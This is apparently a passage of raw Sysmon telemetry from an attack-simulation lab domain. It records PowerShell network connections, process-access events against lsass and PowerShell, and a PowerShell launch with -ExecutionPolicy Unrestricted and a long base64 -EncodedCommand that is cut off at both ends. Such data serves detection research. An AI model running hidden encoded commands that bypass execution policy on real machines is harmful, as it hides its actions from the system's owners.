AGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 354300x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.293{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50356-false152.199.19.161-443https 354300x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.273{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50355-false184.24.15.126a184-24-15-126.deploy.static.akamaitechnologies.com443https 10341000x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.232{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.232{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.201{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ybfwnokl.50r.ps12020-12-08 13:54:15.201 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.185{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.154{10ACEC4A-8587-5FCF-C200-000000009101}43124316C:\Windows\system32\cmd.exe{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.166{10ACEC4A-8587-5FCF-C300-000000009101}5028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwA